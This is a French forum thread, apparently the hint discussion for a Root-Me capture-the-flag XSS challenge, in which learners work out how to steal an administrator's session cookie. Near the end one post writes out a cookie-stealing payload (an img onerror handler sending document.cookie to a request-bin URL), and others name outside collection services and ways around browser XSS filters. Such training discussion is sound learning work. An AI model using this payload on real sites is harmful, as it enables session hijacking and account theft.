Web - Client

Bonjour à tous !

Voila, j’ai un petit problème sur cette épreuve. En effet, j’arrive bien à récupérer le cookie, mais je sais pas trop quoi en faire. Quelqu’un pourrait-il me donner un peu plus d’information aux sujets des cookies ? Ou me renvoyer vers un tuto ? Car après quelques recherches sur le net, je n’ai rien trouvé qui pouvait m’aider :(

Merci d’avance =D

A quoi servent les cookies ?

Il s’agit d’informations que les sites enregistrent. C’est souvent des identifiants, pour se reconnecter automatiquement. C’est ce que j’ai compris en tout cas.. ^^

C’est ca !
Du coup, qu’est-ce que tu peu faire avec ?

Dans l’idéal, ça serait bien de faire une condition dans le script qui utilise ce cookie. Cette condition permettrai de se connecter à la session admin, et dans ce cas, récupérer le mdp, non ?

Maintenant que tu as récupéré le cookie, relis l’énoncé 🙂
Pour ce que tu dis par rapport à la session admin, c’est le cas dans le XSS 2.

Merci beaucoup pour les réponses. Je vais continuer à chercher. Parce que je suis même pas sure d’avoir pris le bon cookie ^^’

Mais par contre, une faut que je l’aurai, c’est bien le JS (ou le html) que je dois modifier ?

Salut, je ne comprend pas.
J’ai trouvé la faille xss, mais pour récupéré le cookie, j’ai lu qu’il fallait disposé d’un serveur perso et créer un script qui récupère le cookie quand l’admin ce rend sur NOTRE site.
si c’est le cas, je n’ai pas de serveur web relié au net, je suis donc limité.
J’espère que je me trompe, sinon ça ne serait pas cool du tout.
Merci de votre aide.

salut je n’ai pas trop regardé l’épreuve mais dans le cas que tu décris tu peux utiliser xssf, pas besoin d’héberger une page sur un serveur sur le web

J’ai bien compris le challenge mais je galère un peu sur la partie exploitation. J’ai inséré un script Javascript qui effectue une redirection vers un script PHP hébergé sur un serveur perso dans lequel je récupère le cookie *************** de l’administrateur. Je constate que celui-ci se connecte et lis mon message après environ 1 minute. En revanche je n’ai récupéré aucun cookie avec cette manip. Une petite indication ?

Salut stargate53, tu fais bien et "normalement" tu devrais l’avoir. Sauf si il n’y à pas d’erreur dans la syntax du script.

salut la compagnie. bon ça fait un petit moment sans réponses sur le sujet mais voilà mon soucis :

j’suis encore assez nouveau dans le domaine donc... je bidouille plus qu’autre chose et je n’ai pas de serveur perso sur lequel renvoyer les cookies.

du coup je me fais une solution basique consistant à exploiter la faille XSS pour remplacer (avec l’event window.onbeforeunload) le texte du message par les cookies de la session et de soumettre le formulaire. après "suffit" de se loguer normalement et ça apparait au grand jour.

enfin ça c’est la théorie... parce que dans la pratique, les messages sont bien enregistrés sur la page mais... la liste de cookies est vide.

quand je fait un "document.cookie" dans la console j’ai rien non plus sur Chrome. j’ai un petit espoir que quand le supposé admin se logue, ça crée des cookies pour lui... mais j’ai quelques doutes ^^

quoiqu’il en soit.. j’ai quand même pas grand chose question résultats... pour pas dire rien.

si quelqu’un a une petite piste à me donner :) merci

Bonjour fdeguibert,

Tu n’es pas obligé d’avoir un serveur perso pour réussir ce challenge, il y a des sites sur lequel tu peux récupérer le résultat de ce type de requête. Voici un exemple de site : http://requestb.in/

Bon courage.

ah super :) merci !

Bonjour :)

J’ai essayé plusieurs fois de trouver le cookie mais j’ai toujours pas réussi.
J’envoie une image avec une redirection vers mon script php perso mais je n’ai encore rien reçu.
Quand est-ce que l’admin est censé lire les messages ?

Merci

Salut chlamy,

Quand tes messages dans la page disparaissent, c’est que l’admin est passé.

Hello à tous ! Je galère un peu ! c koi le kikoo d’admin lolilol ? (J’ai l’impression d’être un kikoo tellement je galère haha bref)

Ce que j’ai essayé et qui n’a pas marché :

– img onerror="alert(’hello’) ;"
– 

Ce que j’ai tenté dans un elan de desespoir :
– Un script qui fait une requete ajax pour balancer document.cookie. Problème : reçu aucun paramètre et j’ai bien l’impression que le cookie que j’ai volé... est le mien ! haha

EDIT :
La console de chrome me donne ça : challenge01.root-me.org/:28 The XSS Auditor refused to execute a script in ’http://challenge01.root-me.org/web-client/ch18/’ because its source code was found within the request. The auditor was enabled as the server sent neither an ’X-XSS-Protection’ nor ’Content-Security-Policy’ header.

Bonjour à tous,

j’ai tenté d’utiliser requestBin mais je ne récupère pas de cookie, juste des infos comme celles-là :

Total-Route-Time : 0
Referer : http://challenge01.root-me.org/web-client/ch18/
Accept : text/html,application/xhtml+xml,application/xml ;q=0.9,*/* ;q=0.8
Via : 1.1 vegur
X-Request-Id : fd737208-0866-42a9-a02e-5909e21b39f8
Accept-Language : fr,fr-fr ;q=0.8,en-us ;q=0.5,en ;q=0.3
Cache-Control : max-age=43200
Host : requestb.in
Connection : close
Connect-Time : 1
User-Agent : Mozilla/5.0 (Windows NT 6.1 ; WOW64 ; rv:12.0) Gecko/20100101 Firefox/12.0
Accept-Encoding : gzip, deflate
RAW BODY

Une idée ?

Bonjour à tous,

j’ai tenté d’utiliser requestBin pour récupérer le cookie admin, mais je ne récupère que ça :

HEADERS

X-Request-Id : ebbde07a-45e9-4a70-be06-e7cb6bd96b9d
Accept-Language : en-us
Via : 1.1 vegur
Referer : http://challenge01.root-me.org/web-client/ch18/index.php?idx=0
Host : requestb.in
User-Agent : Mozilla/4.0 (compatible ; MSIE 8.0 ; Windows NT 6.0)
Connection : close
Total-Route-Time : 0
Accept : */*
Accept-Encoding : gzip, deflate
Connect-Time : 1
RAW BODY

Une idée ?

Ca doit vouloir que tu ne récupères pas le cookie de l’admin donc :)
Regarde bien la syntaxe pour récupérer le cookie.
Challenge validé hier avec requestb.in sans problème.

Bonjour à tous, j’ai le même soucis que Doudou_yaya, j’ai réussi a récupérer le cookie de l’admin mais je ne sais pas quoi en faire... j’ai utilisé requestb.in comme cité plus haut :

HEADERS

Connect-Time : 1
Host : requestb.in
Total-Route-Time : 0
Cookie : _gat=********* ; _ga=********* ; session=***********
User-Agent : Mozilla/5.0 (Windows NT 6.3 ; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36
Accept : image/webp,*/* ;q=0.8
Connection : close
Via : 1.1 vegur
X-Request-Id : a870b7ce-8e6c-4316-8c1b-d73321a8d97f
Referer : http://challenge01.root-me.org/web-client/ch18/
Accept-Encoding : gzip, deflate, sdch
Accept-Language : fr-FR,fr ;q=0.8,en-US ;q=0.6,en ;q=0.4

Tu es presque au bout Pkerblaze, réfléchis un peu et tu trouveras quoi faire de ce cookie. Pense à comment il est traité côté serveur !

Hello all,

ça y est je récupère bien des cookies quand je passe sur la page, mais quand l’admin lit les messages je n’ai pas de nouveau message dans requestbin.
→ cela a-t-il un lien avec le fait que Chrome indique "Token contains a reflected CSS" dans le code source ? J’ai tenté en indiquant "X-XSS-Protection : 0" dans les headers mais rien n’y fait.

Merci pour vos indices.

@Naoli : il ne me semble pas que l’administrateur soit doté d’une sécurité anti-XSS. Néanmoins il y a des techniques pour outre-passer ce genre de sécurité (une balise HTML img par exemple peut charger du contenu en provenance de n’importe quelle adresse externe au domaine qui contient la page sans activer les sécurités anti-XSS).

Hello zM,
Je suis curieux d’en apprendre plus pour la balise img : Quand je joue avec onerror ou onload, c’est quand même bloqué...

Je ne vois toujours pas quoi en faire 3 jours après ><

J’ai chercher comment un cookie ce comporté, a signification des _ga, comment la valeurs de session=**** était généré etc mais je n’ai rien trouvé de concluant...

Aurais-tu une documentation à me suggéré ?

Je te remercies d’avance en tout cas, c’est cool de savoir que j’y suis presque !

@vautrinr : le javascript est intéressant quand il s’agit de gérer le contenu DOM d’une page HTML et pour faire exécuter des actions à l’utilisateur sans son accord dans le cadre d’une attaque XSS. Depuis l’apparition des sécurités anti-XSS (présentes dans la plupart des navigateurs web modernes), faire exécuter des actions à la victime (document.location, XHR etc ...) n’est plus possible, aussi il faut bien se débrouiller avec autre chose ! Une image affichée sur une page HTML n’est rien d’autre qu’un genre d’instruction qui dit au navigateur "va voir à cette adresse, prends l’image et affiche-la à cet endroit".

@Pkerblaze : je n’ai pas l’impression que tu comprennes réellement comment et pourquoi est utilisé le cookie ici. Je te conseille de reproduire ce que tu penses être le code source de la page du challenge (formulaire d’authentification + manipulation du cookie), ça rendra sans doute les choses plus claires pour toi.

@zM : est ce que tu suggère de faire "afficher" un script js dans la page ? :)

Bonjour les gens.

EDIT : J’ai réglé mon problème

Bonsoir à tous,

Un petit tuyau pour bypasser l’anti-XSS ?

Bonjour,

Je récupère également le cookie mais quand je le remplace rien ne se passe et je ne passe pas administrateur dans le statuts :(
Une petite aide pour m’indiquer ce qu’il me manque ?

Résolu je regardais pas au bon endroit

Bonjour, je n’arrive pas à envoyer le cookie vers mon hookbin dans ma requête.
[ NO SPOIL PLZ]

On a le gagnant du spoiler de l’année

Aïe sorry je ne pensais pas être si prêt de la réponse. xD
N’empêche que je n’y arrive toujours pas, problème de syntaxe sûrement ?

Bonjour à tous,
Je galère sur ce challenge pour lequel j’ai compris la théorie. Utilisation d’une injection js caché dans un message (xss), voir dans une image ( xhr ? csp ?) pour demander a l’admin de "donner" son cookie sur un serveur type beeceptor.
Jusqu’à présent tous va bien, je découvre complètement cet univers et j’ai des bases pas solide en php / js - en gros je bidouille mais je comprends après coups.
Lors de mes bidouilles, j’ai ce message "Migrate entirely to HTTPS to allow cookies to be set by same-site subresources". J’ai donc tenté de charger le challenge en htpps, marche pas (of course), j’ai tenté de joindre beeceptor en http, cela marche pas non plus. Est-ce que je suis sur une piste ou c’est en amont mon erreur ?
De plus, beeceptor il faut lui expliquer qu’il va recevoir un cookie ou c’est magique et tous ce qu’il recoit il le stock ? pour le moment dans mes tests console il ralait que je n’avais pas créé de "mock" pour ce qu’il recevait
Merci d’avance pour toutes pistes ou lecture que vous m’inviterez a m’instruire (j’ai lu ce associé au challenge),

Salut,

Tu es sur la bonne piste.
Je pense que tu essaies peut-être de faire un truc trop compliqué.
Pas de souci pour utiliser beeceptor sur ce challenge.
Et on peut dire que beeceptor est magique oui, rien à créer de particulier a part ton endpoint (tant que tu ne gères pas ses réponses aux requêtes reçues)
Par exemple si tu créé un endpoint "test" sur beeceptor, toutes les requêtes arrivant sur `https://test.free.beeceptor.com` seront loggées sur `https://beeceptor.com/console/test`.

Bonjour, comme pour beaucoup je bloque sur cet exercice, je tente d’utiliser beeseptor ou bien un serveur local en js avec ngrok, mais à chaque tentative d’injection, je vois bien mon propre log mais pas celui de l’admin et je ne comprend pas pourquoi. Mon message est bien lu mais rien n’apparait dans la liste des requetes. Il n’y a que le mien :

GET /favicon.ico
GET / ?params=monparam

Vous auriez un petit indice ?

Bonjour à tous,
J’ai planché toute l’après-midi et j’ai trouvé quelques aides pour le code de la requête XSS : img src=x onerror=this.src=’https://xxxxxx.b.requestbin.net?cookie=’+document.cookie
Ce qui signifierait la création d’un lien d’une image qu’on nomme "x" et comme ça n’existe pas à l’erreur ça lance le lien sur le noeud bin.
Comme l’erreur se réplique dans la requête sur le message on atteint vite le quota journalier d’informations délivré par le site de jonction bin.
Dans l’inspector je retrouve bien le site du challenge (referer : http://challenge01.root-me.org/), le cookie qu’on a aussi via la console (cookie:_ga_SRYSKX09J7=_________.0.0.0 ; _ga=__________.1663192665),
et l’URL du noeud pour utiliser le cookie (https://eoms6y0ft3noxpx.m.pipedream.net/?cookie=_ga_SRYSKX09J7=___________.0.0.0;%20_ga=___________.1663192665)
Et là c’est le drame, j’obtiens : Error in workflow
Et pasta

Please help

Edit : Terminé ! En fait c’était mes cookies que je voyais, avec le bon payload et pipedream ça glisse tout seul